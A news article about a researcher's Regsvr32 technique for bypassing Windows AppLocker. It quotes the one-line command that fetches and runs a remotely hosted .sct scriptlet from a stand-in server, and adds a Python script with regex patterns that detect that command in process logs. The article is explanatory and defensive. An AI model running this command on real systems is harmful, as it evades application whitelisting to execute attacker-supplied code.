Researcher Bypasses Windows AppLocker’s Security to Execute Remote Scripts
A new exploit has been discovered in Windows AppLocker – used to blacklist or whitelist applications – that could allow hackers to bypass your system’s safeguards.
AppLocker exploit bypasses Windows’ app security safeguards
Microsoft introduced AppLocker in Windows 7 and Windows Server 2008 R2; it allows administrators to specify which users or groups can run particular applications within an organization. Casey Smith, a security researcher, has discovered a way to bypass Windows AppLocker and execute remote scripts on a machine. Using Regsvr32, a command line utility designed for registering DLLs in the registry, an attacker can bypass Windows AppLocker restrictions.
The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc…And.. You guessed a signed, default MS binary. Whohoo.
So, all you need to do is host your .sct file at a location you control. From the target, simply execute
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
It's not well documented that regsvr32.exe can accept a URL for a script.
Smith was looking for a way to register a script to bypass AppLocker and discovered that you can get around AppLocker by instructing Regsvr32 to point to a remotely hosted file, such as a script, which lets the system run whichever app you want, bypassing system restrictions. This technique doesn’t require administrative privileges, nor does it alter the registry, making it difficult for admins to detect any changes. There is no patch available yet; however, Microsoft is expected to roll out a patch very soon. In the meantime, users can block Regsvr32.exe with Windows Firewall.
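Because the technique leaves no registry change behind, the process command line is the most direct thing to watch. One way to flag it in process-creation logs is shown below; this is an added example, not code from the researcher or Microsoft. The function names, the sample records and the treatment of `-i:` as equivalent to `/i:` are assumptions.

```python
import re

# First token of a command line (quoted or bare), then the remaining arguments.
FIRST_TOKEN = re.compile(r'^\s*(?:"([^"]+)"|(\S+))(.*)$', re.S)
# /i: switch whose value is an http(s) URL. Assumption: a "-" switch prefix
# is treated the same as "/", so -i: is matched as well.
REMOTE_SWITCH = re.compile(r'(?:^|\s)[/-]i:"?(https?://[^\s"]+)', re.I)
# scrobj.dll given as a bare name or as the last component of a path.
SCROBJ = re.compile(r'(?:^|[\s\\/"])scrobj(?:\.dll)?"?(?=\s|$)', re.I)


def remote_scriptlet_url(command_line):
    """Return the URL passed to regsvr32 /i: alongside scrobj.dll, else None."""
    m = FIRST_TOKEN.match(command_line or "")
    if not m:
        return None
    # Reduce the image path to its file name before comparing.
    image = (m.group(1) or m.group(2)).replace("/", "\\").rsplit("\\", 1)[-1]
    if image.lower() not in ("regsvr32", "regsvr32.exe"):
        return None
    args = m.group(3)
    hit = REMOTE_SWITCH.search(args)
    if hit and SCROBJ.search(args):
        return hit.group(1)
    return None


# Constructed process-creation records: (host, command line). Only the first
# command line is the one quoted in the article; the rest are made up.
SAMPLE_EVENTS = [
    ("WS-01", r'regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll'),
    ("WS-02", r'"C:\Windows\System32\regsvr32.exe" -s -n -u '
              r'-i:HTTPS://server/file.sct C:\Windows\System32\scrobj.dll'),
    ("WS-03", r'regsvr32 /s C:\Windows\System32\scrobj.dll'),   # local only
    ("WS-04", r'regsvr32.exe /s /i:settings.ini example.dll'),  # no URL
    ("WS-05", r'notepad.exe /i:http://server/file.sct scrobj.dll'),
]


def scan(events):
    """Return (host, url) for every record matching the remote-load pattern."""
    return [(host, url) for host, cmd in events
            if (url := remote_scriptlet_url(cmd))]


if __name__ == "__main__":
    for host, url in scan(SAMPLE_EVENTS):
        print(f"{host}: regsvr32 loaded a remote scriptlet from {url}")
```

Matching on the file name alone misses a renamed copy of regsvr32.exe, so pair this with a check on the binary's original file name or hash where the log source records it.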
Windows AppLocker is considered one of the most important security features of the operating system. When talking about Enhanced Mitigation Experience Toolkit (EMET) for the enterprise, Microsoft said earlier this year that AppLocker in Windows 10 provides even better security than EMET.
You can visit the researcher’s blog to read more details of this exploit and the proof-of-concept scripts that can be loaded using Regsvr32 to open a backdoor or a reverse shell over HTTP. We will update this space as Microsoft responds to this serious vulnerability.